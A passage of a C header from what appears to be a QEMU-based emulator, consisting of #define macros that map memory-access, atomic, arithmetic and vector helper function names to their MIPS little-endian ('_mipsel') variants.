helper_le_ldsl_mmu_mipsel #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mipsel #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mipsel #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mipsel #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mipsel #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mipsel #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mipsel #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mipsel #define cpu_ldub_data_ra cpu_ldub_data_ra_mipsel #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mipsel #define cpu_lduw_data_ra cpu_lduw_data_ra_mipsel #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mipsel #define cpu_ldl_data_ra cpu_ldl_data_ra_mipsel #define cpu_ldq_data_ra cpu_ldq_data_ra_mipsel #define cpu_ldub_data cpu_ldub_data_mipsel #define cpu_ldsb_data cpu_ldsb_data_mipsel #define cpu_lduw_data cpu_lduw_data_mipsel #define cpu_ldsw_data cpu_ldsw_data_mipsel #define cpu_ldl_data cpu_ldl_data_mipsel #define cpu_ldq_data cpu_ldq_data_mipsel #define helper_ret_stb_mmu helper_ret_stb_mmu_mipsel #define helper_le_stw_mmu helper_le_stw_mmu_mipsel #define helper_be_stw_mmu helper_be_stw_mmu_mipsel #define helper_le_stl_mmu helper_le_stl_mmu_mipsel #define helper_be_stl_mmu helper_be_stl_mmu_mipsel #define helper_le_stq_mmu helper_le_stq_mmu_mipsel #define helper_be_stq_mmu helper_be_stq_mmu_mipsel #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mipsel #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mipsel #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mipsel #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mipsel #define cpu_stb_data_ra cpu_stb_data_ra_mipsel #define cpu_stw_data_ra cpu_stw_data_ra_mipsel #define cpu_stl_data_ra cpu_stl_data_ra_mipsel #define cpu_stq_data_ra cpu_stq_data_ra_mipsel #define cpu_stb_data cpu_stb_data_mipsel #define cpu_stw_data cpu_stw_data_mipsel #define cpu_stl_data cpu_stl_data_mipsel #define cpu_stq_data cpu_stq_data_mipsel #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mipsel #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_mipsel #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mipsel #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mipsel #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mipsel #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mipsel #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mipsel #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mipsel #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mipsel #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mipsel #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mipsel #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mipsel #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mipsel #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mipsel #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mipsel #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mipsel #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mipsel #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mipsel #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mipsel #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mipsel #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mipsel #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mipsel #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mipsel #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mipsel #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mipsel #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mipsel #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mipsel #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mipsel #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mipsel #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mipsel #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_mipsel #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mipsel #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mipsel #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mipsel #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mipsel #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mipsel #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mipsel #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mipsel #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mipsel #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mipsel #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mipsel #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mipsel #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mipsel #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mipsel #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mipsel #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mipsel #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_mipsel #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mipsel #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mipsel #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mipsel #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mipsel #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mipsel #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mipsel #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mipsel #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mipsel #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mipsel #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mipsel #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mipsel #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mipsel #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mipsel #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mipsel #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mipsel #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mipsel #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mipsel #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mipsel #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mipsel #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mipsel #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mipsel #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mipsel #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mipsel #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mipsel #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mipsel #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mipsel #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mipsel #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mipsel #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_mipsel #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mipsel #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mipsel #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mipsel #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mipsel #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mipsel #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mipsel #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mipsel #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mipsel #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mipsel #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mipsel #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mipsel #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mipsel #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mipsel #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mipsel #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mipsel #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mipsel #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mipsel #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mipsel #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mipsel #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mipsel #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mipsel #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mipsel #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mipsel #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mipsel #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mipsel #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mipsel #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mipsel #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mipsel #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mipsel #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_mipsel #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mipsel #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mipsel #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mipsel #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mipsel #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_mipsel #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mipsel #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mipsel #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mipsel #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mipsel #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mipsel #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mipsel #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mipsel #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mipsel #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mipsel #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mipsel #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mipsel #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mipsel #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mipsel #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mipsel #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mipsel #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mipsel #define helper_atomic_xchgb helper_atomic_xchgb_mipsel #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mipsel #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mipsel #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mipsel #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mipsel #define helper_atomic_add_fetchb helper_atomic_add_fetchb_mipsel #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mipsel #define helper_atomic_or_fetchb helper_atomic_or_fetchb_mipsel #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_mipsel #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mipsel #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mipsel #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mipsel #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mipsel #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mipsel #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_mipsel #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mipsel #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mipsel #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mipsel #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mipsel #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mipsel #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mipsel #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mipsel #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mipsel #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mipsel #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mipsel #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mipsel #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mipsel #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mipsel #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mipsel #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mipsel #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mipsel #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mipsel #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mipsel #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mipsel #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mipsel #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mipsel #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mipsel #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mipsel #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mipsel #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mipsel #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mipsel #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mipsel #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mipsel #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mipsel #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mipsel #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mipsel #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mipsel #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mipsel #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mipsel #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mipsel #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mipsel #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mipsel #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mipsel #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mipsel #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mipsel #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mipsel #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mipsel #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_mipsel #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mipsel #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mipsel #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mipsel #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mipsel #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mipsel #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mipsel #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_mipsel #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mipsel #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mipsel #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mipsel #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mipsel #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mipsel #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mipsel #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mipsel #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mipsel #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mipsel #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mipsel #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mipsel #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mipsel #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mipsel #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mipsel #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mipsel #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mipsel #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mipsel #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mipsel #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mipsel #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mipsel #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mipsel #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mipsel #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mipsel #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mipsel #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mipsel #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mipsel #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mipsel #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mipsel #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mipsel #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mipsel #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mipsel #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mipsel #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mipsel #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mipsel #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mipsel #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mipsel #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mipsel #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mipsel #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mipsel #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mipsel #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mipsel #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mipsel #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mipsel #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mipsel #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_mipsel #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mipsel #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mipsel #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mipsel #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mipsel #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_mipsel #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mipsel #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mipsel #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mipsel #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mipsel #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mipsel #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mipsel #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mipsel #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mipsel #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mipsel #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mipsel #define cpu_ldub_code cpu_ldub_code_mipsel #define cpu_lduw_code cpu_lduw_code_mipsel #define cpu_ldl_code cpu_ldl_code_mipsel #define cpu_ldq_code cpu_ldq_code_mipsel #define helper_div_i32 helper_div_i32_mipsel #define helper_rem_i32 helper_rem_i32_mipsel #define helper_divu_i32 helper_divu_i32_mipsel #define helper_remu_i32 helper_remu_i32_mipsel #define helper_shl_i64 helper_shl_i64_mipsel #define helper_shr_i64 helper_shr_i64_mipsel #define helper_sar_i64 helper_sar_i64_mipsel #define helper_div_i64 helper_div_i64_mipsel #define helper_rem_i64 helper_rem_i64_mipsel #define helper_divu_i64 helper_divu_i64_mipsel #define helper_remu_i64 helper_remu_i64_mipsel #define helper_muluh_i64 helper_muluh_i64_mipsel #define helper_mulsh_i64 helper_mulsh_i64_mipsel #define helper_clz_i32 helper_clz_i32_mipsel #define helper_ctz_i32 helper_ctz_i32_mipsel #define helper_clz_i64 helper_clz_i64_mipsel #define helper_ctz_i64 helper_ctz_i64_mipsel #define helper_clrsb_i32 helper_clrsb_i32_mipsel #define helper_clrsb_i64 helper_clrsb_i64_mipsel #define helper_ctpop_i32 helper_ctpop_i32_mipsel #define helper_ctpop_i64 helper_ctpop_i64_mipsel #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mipsel #define helper_exit_atomic helper_exit_atomic_mipsel #define helper_gvec_add8 helper_gvec_add8_mipsel #define helper_gvec_add16 helper_gvec_add16_mipsel #define helper_gvec_add32 helper_gvec_add32_mipsel #define helper_gvec_add64 helper_gvec_add64_mipsel #define helper_gvec_adds8 helper_gvec_adds8_mipsel #define helper_gvec_adds16 helper_gvec_adds16_mipsel #define helper_gvec_adds32 helper_gvec_adds32_mipsel #define helper_gvec_adds64 helper_gvec_adds64_mipsel #define helper_gvec_sub8 helper_gvec_sub8_mipsel #define helper_gvec_sub16 helper_gvec_sub16_mipsel #define helper_gvec_sub32 helper_gvec_sub32_mipsel #define helper_gvec_sub64 helper_gvec_sub64_mipsel #define helper_gvec_subs8 helper_gvec_subs8_mipsel #define helper_gvec_subs16 helper_gvec_subs16_mipsel #define helper_gvec_subs32 helper_gvec_subs32_mipsel #define helper_gvec_subs64 helper_gvec_subs64_mipsel #define helper_gvec_mul8 helper_gvec_mul8_mipsel #define helper_gvec_mul16 helper_gvec_mul16_mipsel #define helper_gvec_mul32 helper_gvec_mul32_mipsel #define helper_gvec_mul64 helper_gvec_mul64_mipsel #define helper_gvec_muls8 helper_gvec_muls8_mipsel #define helper_gvec_muls16 helper_gvec_muls16_mipsel #define helper_gvec_muls32 helper_gvec_muls32_mipsel #define helper_gvec_muls64 helper_gvec_muls64_mipsel #define helper_gvec_neg8 helper_gvec_neg8_mipsel #define helper_gvec_neg16 helper_gvec_neg16_mipsel #define helper_gvec_neg32 helper_gvec_neg32_mipsel #define helper_gvec_neg64 helper_gvec_neg64_mipsel #define helper_gvec_abs8 helper_gvec_abs8_mipsel #define helper_gvec_abs16 helper_gvec_abs16_mipsel #define helper_gvec_abs32 helper_gvec_abs32_mipsel #define helper_gvec_abs64 helper_gvec_abs64_mipsel #define helper_gvec_mov helper_gvec_mov_mipsel #define helper_gvec_dup64 helper_gvec_dup64_mipsel #define helper_gvec_dup32 helper_gvec_dup32_mipsel #define helper_gvec_dup16 helper_gvec_dup16_mipsel #define helper_gvec_dup8 helper_gvec_dup8_mipsel #define helper_gvec_not helper_gvec_not_mipsel #define helper_gvec_and helper_gvec_and_mipsel #define helper_gvec_or helper_gvec_or_mipsel #define helper_gvec_xor helper_gvec_xor_mipsel #define helper_gvec_andc helper_gvec_andc_mipsel #define helper_gvec_orc helper_gvec_orc_mipsel #define helper_gvec_nand helper_gvec_nand_mipsel #define helper_gvec_nor helper_gvec_nor_mipsel #define helper_gvec_eqv helper_gvec_eqv_mipsel #define helper_gvec_ands helper_gvec_ands_mipsel #define helper_gvec_xors helper_gvec_xors_mipsel #define helper_gvec_ors helper_gvec_ors_mipsel #define helper_gvec_shl8i helper_gvec_shl8i_mipsel #define helper_gvec_shl16i helper_gvec_shl16i_mipsel #define helper_gvec_shl32i helper_gvec_shl32i_mipsel #define helper_gvec_shl64i helper_gvec_shl64i_mipsel #define helper_gvec_shr8i helper_gvec_shr8i_mipsel #define helper_gvec_shr16i helper_gvec_shr16i_mipsel #define helper_gvec_shr32i helper_gvec_shr32i_mipsel #define helper_gvec_shr64i helper_gvec_shr64i_mipsel #define helper_gvec_sar8i helper_gvec_sar8i_mipsel #define helper_gvec_sar16i helper_gvec_sar16i_mipsel #define helper_gvec_sar32i helper_gvec_sar32i_mipsel #define helper_gvec_sar64i helper_gvec_sar64i_mipsel #define helper_gvec_shl8v helper_gvec_shl8v_mipsel #define helper_gvec_shl16v helper_gvec_shl16v_mipsel #define helper_gvec_shl32v helper_gvec_shl32v_mipsel #define helper_gvec_shl64v helper_gvec_shl64v_mipsel #define helper_gvec_shr8v helper_gvec_shr8v_mipsel #define helper_gvec_shr16v helper_gvec_shr16v_mipsel #define helper_gvec_shr32v helper_gvec_shr32v_mipsel #define helper_gvec_shr64v helper_gvec_shr64v_mipsel #define helper_gvec_sar8v helper_gvec_sar8v_mipsel #define helper_gvec_sar16v helper_gvec_sar16v_mipsel #define helper_gvec_sar32v helper_gvec_sar32v_mipsel #define helper_gvec_sar64v helper_gvec_sar64v_mipsel #define helper_gvec_eq8 helper_gvec_eq8_mipsel #define helper_gvec_ne8 helper_gvec_ne8_mipsel #define helper_gvec_lt8 helper_gvec_lt8_mipsel #define helper_gvec_le8 helper_gvec_le8_mipsel #define helper_gvec_ltu8 helper_gvec_ltu8_mipsel #define helper_gvec_leu8 helper_gvec_leu8_mipsel #define helper_gvec_eq16 helper_gvec_eq16_mipsel #define helper_gvec_ne16 helper_gvec_ne16_mipsel #define helper_gvec_lt16 helper_gvec_lt16_mipsel #define helper_gvec_le16 helper_gvec_le16_mipsel #define helper_gvec_ltu16 helper_gvec_ltu16_mipsel #define helper_gvec_leu16 helper_gvec_leu16_mipsel #define helper_gvec_eq32 helper_gvec_eq32_mipsel #define helper_gvec_ne32 helper_gvec_ne32_mipsel #define helper_gvec_lt32 helper_gvec_lt32_mipsel #define helper_gvec_le32 helper_gvec_le32_mipsel #define helper_gvec_ltu32 helper_gvec_ltu32_mipsel #define helper_gvec_leu32 helper_gvec_leu32_mipsel #define helper_gvec_eq64 helper_gvec_eq64_mipsel #define helper_gvec_ne64 helper_gvec_ne64_mipsel #define helper_gvec_lt64 helper_gvec_lt64_mipsel #define helper_gvec_le64 